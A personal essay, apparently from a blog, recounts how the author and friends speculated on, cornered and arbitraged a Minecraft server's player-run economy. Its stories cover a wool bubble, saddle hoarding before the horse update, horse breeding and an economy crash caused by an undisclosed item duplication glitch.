
Economics of Minecraft


Those of us with the means to do as we pleased drove our vast resources into monumental construction. My grandest project was a Chinese city, tragically cut short by server reset. View from the north, inside the outer wall.

The first game I ever outsmarted was Final Fantasy 6. I was eight or nine. The rafting level after the Returners' hideout. You're shunted along on a rail, forced into a series of fights that culminate with a boss encounter. You have a temporary party member, Banon, with a zero-cost, group-target heal. The only status ailment the river enemies apply is Darkness, but as a consequence of an infamous bug with the game's evade mechanic, it does nothing. The river forks at two points, and the "wrong" choice at one of the forks sends the raft in a loop. There is a setting that makes the game preserve cursor positions for each character across battles.

I set everything up just right, placed a stack of quarters on the A button, turned off the television, and went to sleep.

I've always loved knowable systems. People are messy and complicated, but systems don't lie to you. Understand how all the parts work, understand how all the parts interact, and you can construct a perfect model of the whole thing in your head. Of course it's more complicated than that. Many people can be understood well enough for practical purposes as mechanical systems, and actual mechanical systems can be impossibly complex and plenty inscrutable. There are entire classes of software vulnerabilities that leverage physical properties of the hardware they run on, properties sufficiently abstracted away that most programmers have never in their lives considered them. But the thought is nice. I dreamed of going into constitutional law as a kid, back when I thought law was a perfect system, with outputs purely a function of inputs, that could be learned and trusted. I got fairly decent at interacting with people basically the same way you train a neural net, dumbly adjusting weights to minimize a loss function until I stumbled into something "good enough." I have to physically suppress the urge to hedge nearly everything I say with, "Well, it's way more complicated than this, but..."

So I know what I like, at least. Games scratched for a while this itch I have. Outright cheating always kind of bored me. Any asshole could plug in a Game Genie and look up codes online. (It had not occurred to me, as a child, that these "codes" were actually modifications to learnable systems themselves.) What I liked was playing within the confines of the rules, building an understanding of how the thing worked, then finding some leverage and exploiting the hell out of it. It's an interesting enough pursuit on its own, but all that gets cranked up an order of magnitude online. You're still just tinkering with systems. Watching how they function absent your influence, testing some inputs and observing the outputs, figuring things out, and taking control. But now you have marks, competition, and an audience. And just, like, people. People affect the system and become part of the system and make things so much more complex that the joy of figuring it all out is that much greater.

After sinking 10-20k hours into a single MMO and accomplishing a lot of unbelievable things within the confines of its gargantuan ruleset, it is generally pretty easy for me to pick up another game and figure out what makes it tick. I'll tell the story about that whole experience sometime, but it's a long tale to tell. This is about one of those other games: Minecraft.

Classical Chinese city planning divided the space of a city into nine congruent squares, numbered to sum to 15 in all directions. Everything was oriented on a north-south axis, with all important buildings facing south (here toward bottom-right). The palace sat in the center, protected by its own wall with gatehouses and corner towers more ornate than those on the outer wall. The court sat in front of the sanctum, the market behind, the temple to the ancestors to the left, and temples to agriculture on the right. This all derives from the Rites of Zhou, and is presumed to be the exact layout of their first capital, Chengzhou, before the flight to Wangcheng.

The Players (names changed)

Alice
Ok this name wasn't changed.
Emma
Breathtaking builder with nigh-limitless cash reserves. Often called the queen of the server and earned the hell out of the title. She'd buy items at three times market just because she needed lots fast, and she bought so much her price became the price. And the builds she made with them were truly remarkable. Living legend.
Samantha
Before the currency was backed by experience points, she built the fastest mob grinder on the server and made an ungodly amount of money selling enchantments. Would quit for months, come back, and shake the economy up like no one else.
Victoria
Chief architect of an extensive rail network in the nether. Kept a finger on the pulse of the economy and bled it for all it was worth. Played the market like a harp. A lot of our best schemes were Victoria's schemes.

By the time of the Crash, we four were among the most influential people in the economy. By the end of the recovery from it, we owned the economy. The cartel we formed to pull the market back from the brink had about a half-dozen other significant players, and everyone contributed plenty, but for the most part the four of us called the shots and had the capital to back it up. When the server was wiped for the biome update, we vaulted every hurdle, most of which were put in place specifically because of us, and reclaimed our riches in a matter of months.

Zel
Market maker. Known for the Emporium, a massive store near the marketplace proper that also bought everything it sold, a rare practice. Got rather wealthy off the spread on items; I almost single-handedly bankrupted them off the price differences between items. Also wrote our IRC bot, so for a time !alice triggered a lighthearted joke about my ruthlessness.
Lily
Kicked off the wool bubble. Did quite well for herself, as she was a producer rather than a speculator.
Charlotte
Discovered an item duping glitch and crashed the entire economy. Never shared the existence of the vuln or her exploit for it with a soul, as far as I know. Was obvious to me what she was doing, but only because I understood the economy well enough to know it was impossible any other way. If she'd switched to a burner account and laundered the money, she probably would have gotten away with it. Good kid. Hope she learns to program.
Jill, Frank
Just as lovely as everyone else, but for our purposes, "two wool speculators."

My main shop in the market, the last in a series of four locations, trading up each time.

Starting Out

Working a game's economy is an interesting pursuit because it, like most interesting pursuits, requires your whole brain to get really good at it. It's both analytical and creative: devise general theories with broad applicability, but retain a willingness to disregard or reevaluate those theories when something contradicts them. And it's fun as hell. There's not much quite like the brainfeel of starting with nothing, carving out a niche, getting a foothold, and snowballing. Game economies are all radically different because there aren't any limits on weird things the designers can do with the game, but they're all fundamentally similar too. Here are the tricks to breaking any of them, as basic as they may be:

  • Learn the game inside and out. You don't necessarily need to get good at it. (I was a terrible player of my MMO for the first couple years I was involved in top-tier play. My primary role in my guild before I actually got good at the game itself was "in-house mechanics wonk," and it was an important role.) But you need to know what "good" is. It's hard to speculate on pork bellies without understanding why people care about pigs in the first place.
  • Read the patch notes and keep them in mind. Read the upcoming changes until you know them by heart. Actually think about how changes to the game will change the market. This is as overpowered as insider trading is in the real economy, except the information is all right there in public. Most players never do this, and you can make a killing in any game by hoarding the things that will be more valuable when the patch hits than they are right now. You would be amazed how fast "I'm so excited about [useless item becoming incredibly useful]!!" turns to "omg why is [suddenly useful item] so expensive :( :(" the moment the patch drops.
  • Study a tiny piece of the market. Don't touch it, just watch until you think you understand it. Make a small bet and see whether it pays off. Consider whether your hypothesis was right or whether you just got lucky. Slowly increase the size of your bets. Explore other tiny pieces. Think about how those pieces interact, how they are similar, how they differ. Manage your risk. Accrue capital so you can increase the size of your bets while decreasing your risk of ruin. It's a bit of art and a bit of science, but you can go from dabbling in a few niches to having a complete understanding of the entire market before you even know it.
  • Study people. Know your competition and know what makes them tick. Know the major buyers, know the tendencies of the swarms of anonymous buyers.
  • Overall just know a lot of things I guess.

I started on my server with only a rudimentary knowledge of the game itself and ipso facto zero understanding of its economy. Within six months or so, I had perhaps as detailed a mental model of it as one could get. I knew the price ranges of most of the items in the game and everything that all of them were used for. I knew how common they were on the market, who the major sellers were, what their supply chains looked like. I knew how fast they sold through, whether the price was stable or tacking a certain way, and I had tons of theories on ways to play all this to get what I needed and turn a profit while doing it, and nearly all of them were sound. Most of it I didn't even think about. I didn't need to contemplate why, for instance, lumber was both cheaper and more common than it should be, such that I could buy it all and hold, force the price up, corner the market, and keep it that way. I just kind of... knew, and did it. It's a wonderful feeling, weaving a system into your mind so tight that it's hard to find the stitches after a while. Highly recommended.

Approaching the city from the north, outside the outer wall. In general I modelled the structures on the outer wall on the robust Song styles, with the inner more in the ornate Ming fashion. Terraced farms harvestable by water alongside large livestock pens provided all the food I needed.

Econ Infodump

Our server had an economy plugin called QuickShop. It added to the game a currency called marbles. Functionally marbles were nothing more than a number tied to your account. Marbles were backed by experience points, freely convertible in both directions by command. Experience points had intrinsic value because they were used for item enchantments, for instance to increase the mining speed of a tool or the damage of a weapon. Thus all the properties of a proper medium of exchange.

QuickShop also added, as one might expect, shops. Shops were chests with signs on them that bought or sold a designated item at a designated price. The moderators reserved a tract of land close to spawn as the official marketplace and leased a limited number of plots there to the public. There were many attempts by the playerbase to create competing unofficial markets, to varying degrees of success. The official market also had an official store, which sold certain items that were nearly impossible (cracked stone brick) or literally impossible (spawn eggs, sponge) to get otherwise. There was a plugin to lock chests, a plugin to remove randomness from the enchanting process, a plugin to bound the size of the world, a plugin to warp you between spawn, market, and your designated home. Other than that the server was vanilla survival non-PVP, no weird items or mobs. (In most cases I'm talking about 1.5 unless context implies 1.6/1.7.)

One marble was equal to two levels of experience. A diamond was generally 18-23M depending on the economy, and as they were extremely useful and their price could generally be relied on to stay in this range, diamonds were an excellent alternative store of value. Stone and dirt were 0.01M, the smallest you could subdivide a marble. In practice currency divisibility was never a source of friction; most resources were bought and sold by the stack (64 blocks) or chest (1728 blocks). Beacons were the most valuable item and ranged anywhere from 2000M to 8000M. Max enchant for an item cost 40-60 levels, i.e. 80-120M. Anyone who mined diamond without Fortune 3 was a fool, anyone who broke any blocks at all without Efficiency 5 Unbreaking 3 was a scrub. The server had anywhere from a few hundred to just under a thousand weekly active players, maybe more than a thousand during summer months. Only the top ~1-3% of us were wealthy enough that we didn't have to mine unless we felt like it and were free to devote all our playing time to Great Works.
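For the curious, here's a minimal sketch in Python of how that bookkeeping pencils out; the prices are midpoints of the ranges quoted above, and the sample stash is invented.

```python
# Rough price book from the figures above, in marbles per item.
# Values are midpoints of the quoted ranges and purely illustrative.
PRICES = {
    "diamond": 20,      # "generally 18-23M"
    "stone": 0.01,
    "dirt": 0.01,
    "beacon": 5000,     # "anywhere from 2000M to 8000M"
}

STACK = 64       # most goods traded by the stack
CHEST = 1728     # or by the chest: 27 slots * 64 per slot

def value(stash):
    """Value a stash of items in marbles at the rough prices above."""
    return sum(PRICES[item] * count for item, count in stash.items())

# e.g. a chest of stone, a stack of diamonds, and one beacon
print(value({"stone": CHEST, "diamond": STACK, "beacon": 1}))  # ~6297 marbles
```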

Virtual economies can be quite unlike real-world ones because the physical laws of the space are different, but analogies can be drawn, and the similarities and differences are both fascinating. Due to the warp mechanism, other than near public warp points like spawn and market, land was abundant and low-value--it mattered little whether you were 5000 or 50000 blocks from spawn if you could /home there from anywhere. Property rights were enforced by the admins. Claims worked something like homesteading in that you couldn't just stick a sign in the dirt, but if you worked the land, it was yours. Land could be owned communally, but tenants had no rights except to their movable property. ("Let's build a town together" sometimes worked well. "Hey join my town" never did.) Vandalism and theft were mostly eliminated by the LogBlock panopticon. With suspensions and permabans being the only analogs for physical coercion, the admins derived their monopoly on violence from the fundamental properties of the universe. They used their power very carefully, however, kept in check by the fact that there were zero barriers to exit beyond social ties and time investment. The internet births interesting societies.

One property of Minecraft itself is that items can be grouped into the disjoint sets "renewable" and "nonrenewable". Nonrenewable resources are just that: a fixed number of them are created when the world is genned, no more will ever exist. Diamond is the big one, both mechanically crucial and totally nonrenewable, hence its excellence as a store of value. The only way to get them is to dig them out of the ground. This isn't a statement on effort or rarity--dirt is nonrenewable, for instance--just the fact that they cannot be created out of thin air.

Renewable resources can be created out of thin air. A subset of renewable resources can be farmed; a subset of farmable resources can be autofarmed. Some examples: redstone is technically renewable through villager trading or witch farming, but the cost of the former and the hassle of the latter make it infeasible, especially given how commonly it's encountered while diamond mining. Wheat is both renewable and farmable: plant seeds, harvest wheat, get more seeds from that, repeat. Harvesting can be automated with machines that run water over the fields and send the products into hoppers that feed chests. Replanting, however, requires a right click. Cactus is completely autofarmable: cacti grow to three blocks tall, cactus blocks break and drop the item if directly adjacent to another block, cacti grow irrespective of that fact. So you float blocks next to where they'd grow, flowing water underneath to channel the output into a hopper, cactus blocks accumulate forever with zero human intervention.

The important bit: with farmable resources, double the size of your farm and you double your output while spending less than double the time on each harvest. The only way to get twice as much diamond is to dig twice as long. Sublinear vs. linear cost. Autofarmable resources take time to accumulate, but the time spent harvesting is for practical purposes zero.
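A toy model of that scaling difference, with every constant invented, just to make the contrast concrete:

```python
# Toy model of the scaling argument above; all of the constants are made up.
def wheat_per_hour(farm_size):
    # one harvest yields farm_size wheat, but harvest time grows slower
    # than the farm does (fixed overhead, walking the same rows, etc.)
    harvest_minutes = 5 + 0.4 * farm_size ** 0.7
    return farm_size / (harvest_minutes / 60)

def diamonds_per_hour():
    # nonrenewables are strictly linear: twice the diamonds, twice the digging
    return 20

for size in (50, 100, 200, 400):
    print(size, round(wheat_per_hour(size)))   # 268, 399, 563, 762
print(diamonds_per_hour())                     # always 20, no matter what
```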

The properties of diamond make it in many ways the most crucial and interesting item in the game. But I'll get to that. First, a story about sheep.

Approach from the south, audience hall before the main entrance to the inner city. The guardian lions are arranged as is traditional. Male, on the left (from a south-facing perspective), its paw on a ball representing dominance over the world. Female, on the right, its paw on a cub representing nature.

All's Wool That Ends Wool

Sheep function kind of like wheat. You can breed an arbitrary number of them and efficiency increases on a curve, but shearing hundreds of sheep is at least as time-consuming as replanting hundreds of seeds, probably more so. Wool is a much more interesting resource, though. Sixteen different colors, and when building with wool, you generally need particular colors and you need them in bulk. White wool blocks can be dyed individually, but dye cost makes this infeasible for most colors in large batches. You can dye a sheep any color, however, and it will produce that color wool indefinitely.

Colored wool was notoriously hard to get on the market, and most just took this as a fact of life. People tended to grow their own food because it was relatively low-effort and cost nothing. So it was common to just keep a pen of sheep near the food, dye them when you needed a particular color, shear them over the course of days or weeks until you had enough wool for your build. Market rate for white wool was 0.08M, stable supply and decent demand, perfectly natural price. Colored wool, however...

  • You'd need sixteen shop chests rather than just the one, and floorspace in official market shops was valuable because they were size-limited by admin fiat.
  • Colored wool sales were virtually impossible to predict. You'd sell out of blue in an instant because someone happened to need blue. Maybe you restock and don't sell another block of blue for a month. So you had to stock everything all the time, meaning you had to have a lot of sheep.
  • You may be the only seller in the market, but you're competing against prospective buyers just doing it themselves. Since it was common knowledge that colored wool wasn't available on the market, people had already gotten used to doing it themselves, in part because...
  • Shearing sheep was fucking annoying. Shearing sixteen different pens of sheep for 0.08M a block when most of those blocks would languish most of the time was plain stupid. Sellers lost interest fast, so buyers got used to here-today-gone-tomorrow wool stores and adapted to there never being a reliable source.

What should have been obvious though was that because of all this, colored wool was simply more valuable. Plenty of demand, virtually no supply, who gives a shit about the price of white wool, right? People just assumed because the blocks were mechanically the same, they were worth the same.

Emma realized this and spread word on the grapevine that colored wool was an untapped market with massive profit potential. (I'm pretty sure she did it because she needed a lot of wool and was hoping for someone to do the work for her.) And whenever Emma said there was money to be made, everyone listened.

Lily was the first. She bred up hundreds and hundreds of sheep (so many that she had to cull the herd a bit because her FPS cratered whenever she looked at them) and by week's end there was a brand new wool store in the market with a full chest of every single color, plus a sign promising there'd always be more where that came from. She sold for 0.12M and business was good.

Really good, in fact. Even with the 50% increase, she sheared sheep for hours and could barely stay in stock of any color, despite the received wisdom that colored wool sold erratically. That's because another player, Jill, was buying out her entire inventory and reselling it across the street for 0.2M. And Jill didn't do too bad for herself either. Pretty soon wool went from a backchannel convo topic to the hottest game in town.

On the heels of Jill's success, Frank opened his own wool store. Not only did he sell for 0.35M, he bought via the same doublechest at 0.2M. Lily raised her price to compensate. Zel got in on the action with their own buy/sell doublechests, and everyone said business was booming. Prices kept climbing, and at the height of it, Zel was buying at 0.5M a block and selling for even more, while all the normals who just wanted a bit of wool here and there complained about the "crazy" market. Sorry guys, they were told, that's what wool is actually worth nowadays.

Except not quite. No one who wanted wool for consumption was actually paying those prices, it was all wool merchants buying each other out. I knew better than to get involved--it felt a lot like a bubble, so any investment at all carried unacceptable risk. Unless, of course, there was a way to get instant money with zero risk.

Wool, again, is renewable. It's farmable. Farming it is annoying, sure, but it's dead easy. While the price was climbing on speculation, a new seller nobody had heard of set up his own shop, without much fanfare, selling every color at 0.1M. He'd built his own farm, like they used to back in the olden days of less than a month ago. Jill and I were the only ones who even knew he existed, because every day when he logged in, we kept one eye on the server map. When we saw him warp to market, we raced to his shop to buy out anything he'd restocked. I imagine anyone else who noticed his store just figured it was always empty.

Jill used his wool to refill her chests. She did decent business. I took everything I bought, however, and immediately dumped it into Zel's buy chests. Quintuple what I paid, not a bad deal at all. As I started to fill their chests up, I sold anything else to Frank and a few other small-time buyers, the objective always being to unload what I bought within the hour. After a while, "haha where are you getting all this wool from :P" turned to "no seriously alice where are you getting all this wool from." The bottom fell out of the market as the speculators shifted from "turn a profit" to "cut my losses" to "sell sell sell." Colored wool corrected to the nice sensible price of 0.12M and all was right with the world.

Through the audience hall, a courtyard before the gatehouse guarding the inner city.

"It's Your Money, and I Need It Now!"

Buy chests can be a real bitch. Emma, Victoria, and I used them extensively, but we used them right. Most people didn't use them. Most everyone else who did used them very, very wrong.

If you set a chest to buy an item at some price, it is possible for anyone at any time to sell you 1728 of that item. If you do this, you'd better be damn sure you want 1728 of that item. If you don't, you can pad out the chest with garbage to reduce its capacity. Set up a buy chest for say diamonds, put dirt blocks in 26 of the slots, now you can't be sold more than 64 diamonds. No one ever did this. I'm not sure it even occurred to most people that it was possible. One thing I got very, very used to seeing was the helpful message, "Failed to sell N items: player can only afford M."
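The padding trick is just slot arithmetic; a quick sketch, borrowing the 20M diamond figure from earlier as the example price:

```python
# A shop chest has 27 slots of 64, so an empty buy chest exposes you to 1728
# items per restock. Padding slots with junk caps the worst case.
SLOTS, STACK = 27, 64

def max_exposure(padded_slots, price):
    """Worst-case marbles you can be forced to spend in one restock."""
    open_slots = SLOTS - padded_slots
    return open_slots * STACK * price

print(max_exposure(0, 20))    # empty diamond buy chest at 20M: 34,560M of risk
print(max_exposure(26, 20))   # 26 slots of dirt: capped at 64 diamonds, 1,280M
```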

As long as you knew what you were doing though, buy chests were beautiful tools.

Emma liked to buy materials for her builds for more than what people were selling. (Naturally, she first bought out every seller in the market.) Her prices were so good that people would spend hours a day doing the boring work for her. That's how I got my start, too--sold her maybe 15000 blocks of clay at 1M per over the course of a couple weeks. Enough capital to get me established, and within a month or two after that, playing the market made me enough cash that I didn't have to mine for anything.

Buying for less than market rate worked great too, if you didn't mind waiting. This is what I tended to do, both for things I needed and for things I turned around and sold at a markup. I rarely set up a buy chest that I didn't intend to keep open for months, and I adjusted my prices to change my burn rate rather than ever stop buying. It worked beautifully because over time people came to rely on my buy chests and could trust they weren't going away. I accumulated a group of regulars who sold to me because they knew I was always buying, and word of mouth drove more to me too. "Are ink sacs worth anything?" the newbie asks. "Yep, Alice buys those," says the good samaritan, who then brings them right to my door. Splendid.

Victoria did plenty of that kind of business too, but my favorite hustle of hers was her farm. She had on her land wheat fields, livestock pens, a tree farm, and various other such things. I mean, we all did, but she set up buy chests for all those goods right there at something like a quarter market rate. I was way the hell in the middle of nowhere, so it wouldn't have worked for me, but she also had the nether rail. "Take the white line to the third stop and you're right there!" And people would go work her fields, shear her sheep, chop down her trees, replant everything, and immediately sell her the goods at rock-bottom prices.

But that was us. Most people who set up buy chests, they were just begging for someone to take all their money. Few angles were more profitable or more reliable. No one was as good at it as me, in large part because I knew the entire market. Once or twice a day I'd stroll through the marketplace peeking in all the stores to see what changed. I didn't just know how much everything was worth, I knew every item every store bought and sold at what price and how much they had and how all those things had changed over time. To a reasonable degree of accuracy, anyway.

Imagine: p-queue of every chest, prioritized by item importance, "importance" being some heuristic incorporating overall supply/demand, whether I personally needed it, what kind of margin I could expect to make flipping it, whose store it was, what kind of foot traffic that store got, which market it was in... few other things I suppose, it wasn't a system so much as a feeling. First few hundred chests in the queue I flat-out memorized. Next thousand or so I knew which store what item and around how much. All the rest I knew there was a store in a general area that bought or sold the item at a good bad or ok price. By "all the rest" I mean all. At the height of it there was Market East, Market West, Market 2 (don't ask), Zel's Emporium, The Mall, and a couple dozen minor destinations in distant locales most players didn't even know about. Ballpark 16 chests/shop * 16 shops/row * 4 rows/market * 3 markets + Zel ~= 3200 chests and a couple thousand more in the hinterlands.
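If you wrote the thing down instead of feeling it, it might look something like this; the scoring weights and the two sample chests are invented:

```python
import heapq
from dataclasses import dataclass, field

# A literal take on the "p-queue of every chest" described above. The real
# thing was a feeling, not a formula, so the weights here are arbitrary.

@dataclass(order=True)
class ChestEntry:
    priority: float
    shop: str = field(compare=False)
    item: str = field(compare=False)
    price: float = field(compare=False)

def importance(demand, personal_need, flip_margin, foot_traffic):
    # heapq is a min-heap, so negate to pop the most important chest first
    return -(2.0 * demand + 1.5 * personal_need + 3.0 * flip_margin + foot_traffic)

queue = []
heapq.heappush(queue, ChestEntry(importance(0.9, 0.2, 0.8, 0.7),
                                 "Zel's Emporium", "diamond", 20))
heapq.heappush(queue, ChestEntry(importance(0.1, 0.0, 0.1, 0.3),
                                 "Market East, row 2", "lilypad", 5))

top = heapq.heappop(queue)   # the chest worth checking first on today's stroll
print(top.shop, top.item, top.price)
```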

For most of the people in the top tier, I knew their stores better than they did. It wasn't uncommon, for instance, for Zel to tell someone in chat, "I sell X item for P marbles," only for me to interject, "You sell X for Q but you've been out of stock for a week. Market East, second left, third shop on the right sells for R." One time I caught someone who had been using a hopper to siphon emeralds out of one of Victoria's shop chests. I didn't witness it or anything, I just noticed her supply had steadily dropped over the course of a week at a rate that was highly unusual given how the emerald market normally flowed. Summoned a mod to check the history of the blocks underneath, and my suspicions were confirmed. Victoria hadn't realized anything was even missing.

(A little while later someone scooped a beacon from me in the same manner; I'd since learned who did Victoria's shop, so I private messaged the likely culprit with a few choice words. They apologized profusely, swore to mend their ways... and a few hours later hoppered three beacons back to replace the one they took. A happy ending for all involved, I'd say. After this I replaced the blocks underneath my chests with locked furnaces.)

Anyway. It's easy to cash out on buy chests when you know every shop on the server. And no one had more buy chests than Zel.

The largest structure in the inner city, a palace meant for reception of honored guests and scholar-officials. Similar in layout to a traditional siheyuan, though on a much grander scale. The front structure was more open to visitors (though of course access to the inner city was strictly controlled) while the ruler's living quarters were tucked behind. All in all I didn't leave myself enough space to do a full complex. If I were to do it again, I'd make the city much larger and worry less about leveling terrain (which ended up taking an incredible amount of time).

Ethics in Video Game Commercialism

Zel's Emporium was truly a wonderland. Three stories, couple hundred chests, and every item they sold, they also bought. From the same chest. In theory, the arbitrage business is a good one: set up your shops, keep an eye on the prices, collect free money off the spread with very little effort. The Emporium's stock was so diverse that it did plenty of business in both directions, and Zel had enough cash reserves to bounce back from most setbacks.

Well, most. Let me tell you about lilypads. Lilypads gen on water in swamp biomes. Very common and fairly easy to gather but don't have much use besides decoration. People who wanted them usually just needed a handful to decorate a pond or two, people building in swamps only ever harvested them incidental to other activities, and most people didn't like to build in swamps anyway. Lilypads were garbage. Zel, being the long tail merchant that they were, sold them for 5M. Overpriced relative to their commonness in the world, but fine considering their scarcity in the market. One of their hundreds of tiny rivulets of income.

Zel bought lilypads for 3M. This was easily one of the most absurd prices I had ever seen on the server for anything and I spent days stripping swamp biome after swamp biome for the things just to take advantage of it. I emerged from the swamps and with no warning sold Zel around 3500 lilypads for just over 10000M. Zel later told me they knew the price was high but never in a million years thought anyone would be insane enough to do what I did.

It sounds like I picked on Zel a lot. I really did like them and felt bad about abusing their store so much. Not bad enough not to do it though. Managing a couple hundred chests is hard as hell, and market conditions shifted prices faster than they could keep up. It became almost routine that I'd find something in the market Zel bought for more than the seller sold, buy it out, warp over, free money.
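The routine itself was dead simple; here's a sketch with made-up listings (the real data lived in my head):

```python
# Routine arbitrage as described above: find any item some market shop sells
# for less than Zel's Emporium buys it for. All of the listings are invented.
market_asks = {           # lowest sell price seen in the market, per item
    "lilypad": 1.0,
    "ink sac": 0.5,
    "wool:blue": 0.12,
}
zel_bids = {              # Zel's buy prices for the same items
    "lilypad": 3.0,
    "ink sac": 0.4,
    "wool:blue": 0.5,
}

for item, ask in market_asks.items():
    bid = zel_bids.get(item)
    if bid is not None and bid > ask:
        print(f"buy {item} at {ask}, sell to Zel at {bid}: "
              f"{bid - ask:.2f} marbles each, free money")
```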

Eventually, to my shock, I completely tapped them out. I didn't think it could be done--that they were always able to buy anything was the defining feature of the store, and their reserves seemed deep enough that I never thought I'd drain them. They widened their spreads even further, dropped their sale prices a bit, and tried to recoup. They still had huge stores of goods, so it's not like they were flat on their ass. They brought in a partner and revamped things a bit, and I even sent letters from time to time when they got a price so egregiously wrong that I felt it would be dishonorable to exploit.

Obviously though, the game was up. I couldn't sell them anything if they had no money.

...so I started running back-to-back transactions where I'd buy just enough of their valuable items to give them the precise number of marbles that I planned to reclaim by selling them junk. All's fair, y'know.

The upstairs of my shop. After a few weeks gathering for Emma to get myself established, I started keeping clay for myself. By the time 1.6 came I had five or six doublechests and solid stocks of, or supply chains for, every dye. I was the only seller and did pretty well.

Clays 'n Saddles

I don't think I can stress this enough: even if you suck at playing the market, even if you don't have much time to invest into the game, you can blow any virtual economy wide open just by reading the upcoming changes, predicting how those changes will shift supply/demand curves, and investing in items based on those predictions. In huge, complicated MMOs, it can often be hard to make accurate predictions without an encyclopedic knowledge of game mechanics. Often it's pretty simple though. People want cool shit.

Minecraft 1.6 was colloquially known as The Horse Update. It added such things as:

  • Horses
  • Hardened clay
  • Coal blocks
  • Stained clay
  • Carpets

It was a popular topic of conversation on our 1.5 server for some time; we always got updates several months late since we needed to wait for Bukkit and our core plugins to update. (I'm not sure if things have changed since, but back then, every Minecraft update was a breaking one. Modders had to dump the jars every release and work from the decompiled artifacts directly. It is a testament to how enjoyable a game Minecraft is to play that it even has a mod community at all.) Here are all the new 1.6 features people on our server talked about:

  • Horses
  • Horses
  • Omg horses
  • Guys I can't wait for horses
  • Horses!!!!

To ride a horse you need a saddle. Prior to 1.6, saddles could only be used to ride pigs, and pigs are terrible mounts, so no one used them. Several shops stocked saddles at 20-30M. Some people sold for more, since saddles were uncraftable and pretty rare, but no one ever paid that much. For about a month leading up to 1.6, I bought any saddle I could find under 60M. In theory most players would only need one or two of the things, so I didn't want to spend absurd amounts on them. I ended up with several dozen, figured they'd go up to maybe 80-90M and I'd turn a decent profit.

Then 1.6 hit and people absolutely lost their minds. Turns out, only a minority of players so excited about the horses had made sure to get ahold of a saddle in preparation for the patch. Most all of them just assumed they could buy a saddle on patch day so why bother getting one early. Several rich players had stockpiled plenty but had zero intention of selling them. Every saddle in the market vanished within a matter of hours: 80M, 120M, 150M, it didn't matter, and after they were all gone, there was much wailing and gnashing of teeth. I knew the price would rise, but I didn't think it would rise that high. You can usually get a saddle or two from a solid day of dungeon crawling. But no one wanted to go explore boring old dungeons. They wanted to ride horses, dammit.

I placed a chest in the center of my main store, atop a nice little diamond block pedestal, selling one saddle, for 750M. Most people laughed at the price, some cursed my greed, plenty sent me private messages trying to haggle or find out if I had more. A few hours later, it sold. I let the chest sit empty until word got around, then put another saddle in it.

All told I moved ten or twelve at 500-750M apiece, for an average profit per saddle of around 1000-2000%. The pricepoint proved unsustainable, but because of a rather mysterious supplier (which I will get to soon) I had a steady stream of saddles that I could sell quite briskly at a modest markup. People were starting to pour hours into extracting the things from dungeons too, hoping to cash in on market conditions they didn't realize had already evaporated. But I managed to outsell them anyway, even as they tried to compete on price, because I had something they didn't: horses.

My horse farm. I considered at one point digging out a space underneath to build a track on which to clock their run speeds. Never ended up doing it, though, because aside from Emma, no one actually cared how fast the horses were.

Horse of a Different Color

Normally, horses spawn naturally in grasslands, just like any other animal. But because we were on an old world, or because of a bug in some plugin we used, they didn't. So the admins sold horse eggs for 150M, single-use items normally unobtainable in survival that spawned a horse (90%) or donkey (10%). Horses came in seven colors and five patterns for a total of 35 different appearances, and people had strong opinions about which one they wanted. Average players could afford one or two, but with such a low chance of getting what they wanted, many found themselves disappointed or else didn't even bother.

I scouted out locations close to spawn (a difficult task given how overdeveloped the land was), eventually discovering a small mountain with someone's home built atop it; its owner probably wouldn't notice or mind that overnight I'd hollowed it out and stuck a couple doors on the side. Set up pens with fences in my cavern under the mountain, bought fifteen or so eggs, popped them all and started breeding the output. Breeding took an item of negligible cost given to each horse and produced a foal with close to a 50-50 chance of inheriting one of the parents' colors and one of their patterns, with a very small chance of getting a random one instead. There's a cooldown of some minutes before they can be bred again. Foals can be raised into adults instantly by spamming them with wheat. It took a few days of cross-breeding and culling, but eventually I had 70 horses, two of each combination, separated into seven pens by color, along with a handful of donkeys and mules.

I sold horses for 100M, two-thirds the price of an egg, but unlike the crapshoot the eggs were, I could offer any style the buyer wanted, no risk and no wait. (And at zero marginal cost.) Buy a saddle with the horse and get an extra discount. This proved to be a nice side business for some time.
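For the curious, the arithmetic that made 100M an easy sell, using the egg numbers above and assuming the 35 appearances are equally likely from an egg (which is a guess):

```python
# Expected cost of rolling one specific horse appearance from admin eggs,
# vs. buying it bred to order for 100M. Uniformity across looks is assumed.
EGG_PRICE = 150          # marbles per egg
P_HORSE = 0.9            # 10% of eggs hatch donkeys instead
APPEARANCES = 35         # 7 colors * 5 patterns

p_hit = P_HORSE / APPEARANCES        # chance a single egg is the horse you want
expected_eggs = 1 / p_hit            # mean of a geometric distribution
expected_cost = expected_eggs * EGG_PRICE

print(round(expected_eggs, 1), round(expected_cost))   # ~38.9 eggs, ~5833M
print("vs. a bred-to-order horse at 100M")
```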

My warehouse, in the basement of the palace. The view from the opposite corner is much the same. Some of the ladders descend to more stacks of doublechests underneath. Organizing and labeling all of this is probably one of the most autistic things I've ever done. Though I'm pretty sure everything in this post qualifies.

She Went to Jared

Or, How I Learned to Stop Worrying and Love Catastrophic Economic Meltdown

So an interesting thing happened during the whole saddle episode. As I became well-known for having the only consistently available, if rather pricey, stock of the item, a player named Charlotte messaged me asking if I'd like to buy more. They were selling rather briskly now, I was starting to run low, and especially since I was planning on getting into the horse business too, I needed a steady supplier. She'd sell me six or seven at a time for 50 or 60M, saying that was all she had, but whenever I went back, she had more. A bit strange but nothing too out of the ordinary. She had a few orbiters, so I figured maybe they were working together to excavate the things. Anyway, it was good for me.

Then she opened her store in the far corner of the market. It was truly insane. Diamonds for 6M, when I sold for 20M and Emma for 23M. Emeralds for 5M, gold blocks for 3M. Wither skulls for 120M--three makes a beacon, and beacons sold for thousands when they could be got at all. Enormous quantities of everything, no one could have harvested all this if they spent years, and Charlotte was nowhere near a savvy enough player to have acquired it through the economy. And if she was, she wouldn't have been selling for those prices anyway.

I went to one of the admins and told her someone had discovered a dupe glitch. She told me this was impossible. I explained the evidence, that it was the only likely explanation, that I didn't think anyone should be punished necessarily, but it should at least be corrected and the items deleted. She continued to insist that there was no way this could possibly happen. (She was a programmer herself, and as such probably should have known better.) Wary of being tagged an accomplice then, I asked if it should turn out that these items were in fact duped, would I be punished for trading in them. She assured me that no one would be banned for buying and selling in good faith.

So I went to work.

